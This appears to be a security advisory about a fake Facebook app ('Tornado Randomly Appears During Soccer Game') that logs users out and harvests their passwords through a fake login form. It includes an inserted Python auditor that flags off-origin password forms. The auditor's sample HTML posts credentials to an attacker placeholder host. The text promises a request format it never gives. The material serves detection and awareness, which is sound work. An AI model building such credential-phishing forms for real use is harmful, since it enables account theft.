Recently, an application has been circulating on Facebook that displays the message “Tornado Randomly Appears During Soccer Game”.
Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app logs the user out and asks him/her to log in again.
When the user clicks on the “Login” button, it will show the login form.
When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:
Following the usual best-practice advice, one can check the URL bar to determine where the page came from—but that isn’t enough in this case. The URL bar shows apps.facebook.com when the login form is displayed, even though the credentials are posted to a malicious site instead.
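The mismatch described above (page origin apps.facebook.com, credential destination elsewhere) is something a defender can audit mechanically. The following is an added example, not code from the original post or from Facebook: it parses a page's HTML, finds every form containing a password field, resolves the form action against the page URL, and flags any that post to a different origin. The page URL, the attacker host placeholder and the sample HTML are constructed for illustration; note it only covers form actions, so a script that submits credentials via its own POST (as the fb2.js script does) still needs a runtime control such as a Content-Security-Policy `form-action` / `connect-src` restriction.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormAuditor(HTMLParser):
    """Collect every <form> that contains a password field, with its resolved action URL."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self._current = None   # form currently being parsed, or None
        self.forms = []        # dicts: {"action": absolute URL, "password": bool}

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # A missing or empty action posts back to the page itself.
            action = attrs.get("action") or self.page_url
            self._current = {"action": urljoin(self.page_url, action), "password": False}
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def off_origin_login_forms(page_url, html):
    """Return action URLs of password forms whose (scheme, host) differs from the page's."""
    auditor = LoginFormAuditor(page_url)
    auditor.feed(html)
    auditor.close()
    page = urlsplit(page_url)
    page_origin = (page.scheme.lower(), page.netloc.lower())
    suspicious = []
    for form in auditor.forms:
        if not form["password"]:
            continue
        target = urlsplit(form["action"])
        if (target.scheme.lower(), target.netloc.lower()) != page_origin:
            suspicious.append(form["action"])
    return suspicious


# Constructed sample mirroring the attack: the page is served under apps.facebook.com,
# but its login form posts to an attacker host (placeholder, not a real address).
SAMPLE_PAGE_URL = "https://apps.facebook.com/fake-video-app/"
SAMPLE_HTML = """
<form action="http://ATTACKER-IP-PLACEHOLDER/login" method="post">
  <input type="text" name="email"><input type="password" name="pass">
</form>
<form action="/search" method="get"><input type="text" name="q"></form>
"""

if __name__ == "__main__":
    print(off_origin_login_forms(SAMPLE_PAGE_URL, SAMPLE_HTML))
```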
The bogus app also “likes” the link in an automatic post, which is displayed on the user’s profile.
A similar attack was also observed hosted on the same IP address. It displays a different message: “Video: This is the best April Fools’ prank ever!” This attack employs the same technique as above to steal usernames and passwords for users’ Facebook accounts.
NB: Henceforth, alerts will no longer be sent by SMS; they will be sent to your email instead. Thanks for being careful even as you play in the wild (Internet).
Another Fake Facebook App is Here to Steal your Passwords